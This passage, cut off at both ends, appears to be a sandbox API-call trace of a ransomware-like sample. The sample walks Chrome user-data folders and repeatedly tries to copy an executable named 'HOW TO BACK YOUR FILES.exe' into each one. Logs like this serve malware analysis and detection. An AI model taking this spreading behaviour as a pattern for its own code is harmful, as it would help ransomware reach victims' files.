FILES.exe") returned -1 [0104.735] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.736] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter" [0104.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca068 | out: hHeap=0x2b0000) returned 1 [0104.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0104.736] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter") returned 96 [0104.736] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter" [0104.736] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.736] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\swreporter\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.736] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.737] GetLastError () returned 0x0 [0104.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.737] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.737] CloseHandle (hObject=0x120) returned 1 [0104.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.737] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.737] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SwReporter\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.737] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.737] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.737] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0104.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4180 | out: hHeap=0x2b0000) returned 1 [0104.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0104.737] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 103 [0104.737] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0104.737] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.737] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\sslerrorassistant\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.738] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.738] GetLastError () returned 0x0 [0104.738] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.738] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.739] CloseHandle (hObject=0x120) returned 1 [0104.739] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.739] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.739] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.739] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.739] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.739] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl" [0104.739] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0104.739] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0104.739] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl") returned 91 [0104.739] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl" [0104.739] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.739] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\pnacl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.740] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.740] GetLastError () returned 0x0 [0104.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.740] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.740] CloseHandle (hObject=0x120) returned 1 [0104.740] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.740] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.740] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\pnacl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.740] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.740] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.741] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash" [0104.741] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6dc0 | out: hHeap=0x2b0000) returned 1 [0104.741] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0104.741] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash") returned 97 [0104.741] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash" [0104.741] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.741] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\pepperflash\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.741] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.742] GetLastError () returned 0x0 [0104.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.742] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.742] CloseHandle (hObject=0x120) returned 1 [0104.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.742] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.742] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\PepperFlash\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.742] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.742] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.742] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials" [0104.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0104.742] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials") returned 98 [0104.742] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials" [0104.742] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.743] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\origintrials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.743] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.743] GetLastError () returned 0x0 [0104.743] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.743] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.744] CloseHandle (hObject=0x120) returned 1 [0104.744] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.744] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.744] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\OriginTrials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.744] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.744] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.744] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\FileTypePolicies", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\FileTypePolicies" [0104.744] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\FileTypePolicies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\FileTypePolicies" [0104.744] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.744] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\FileTypePolicies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\filetypepolicies\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.745] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.745] GetLastError () returned 0x0 [0104.745] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.745] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.745] CloseHandle (hObject=0x120) returned 1 [0104.745] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\FileTypePolicies\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de297c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de297c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.746] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.746] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.746] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\EVWhitelist", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\EVWhitelist" [0104.746] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\EVWhitelist" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\EVWhitelist" [0104.746] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.746] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\EVWhitelist\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\evwhitelist\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.747] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.747] GetLastError () returned 0x0 [0104.747] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.747] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.747] CloseHandle (hObject=0x120) returned 1 [0104.747] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.747] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\EVWhitelist\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de297c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de297c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.747] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.747] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.748] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default" [0104.748] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default" [0104.748] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.748] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.749] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.751] GetLastError () returned 0x0 [0104.751] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.751] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, 